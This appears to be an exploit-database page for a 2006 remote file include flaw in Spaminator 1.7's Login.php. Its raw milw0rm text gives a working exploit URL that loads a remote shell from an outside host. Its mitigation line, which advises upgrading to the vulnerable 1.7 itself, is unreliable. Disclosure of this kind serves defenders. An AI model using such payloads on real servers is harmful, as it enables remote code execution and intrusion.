header-logo
Suggest Exploit
vendor:
Spaminator
by:
ToXiC, Drago84
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Spaminator
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: Yes
Related CWE: N/A
CPE: a:spaminator:spaminator:1.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Spaminator 1.7. ($page) Remote File Include

Spaminator 1.7. is vulnerable to a remote file include vulnerability. The vulnerable code is located in the /src/Login.php page, where the variable $page is declared and then included in the code. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable server, such as http://server/dir_spaminator/src/Login.php?page=http://www.evalsite.com/shell.php?. This will allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

Upgrade to the latest version of Spaminator 1.7.
Source

Exploit-DB raw data:

Spaminator 1.7. ($page) Remote File Include
CreW: ToXiC
BuG Found By Drago84

SourcE CodE:
http://freshmeat.net/redir/spaminator/16281/url_tgz/spaminator-1.7.tar.gz

Page Affect is:
/src/Login.php

Problem is
   include "$page.php";

Path :
Declare $page

ExpL:
http://server/dir_spaminator/src/Login.php?page=http://www.evalsite.com/shell.php?

Greatz:str0ke

# milw0rm.com [2006-08-10]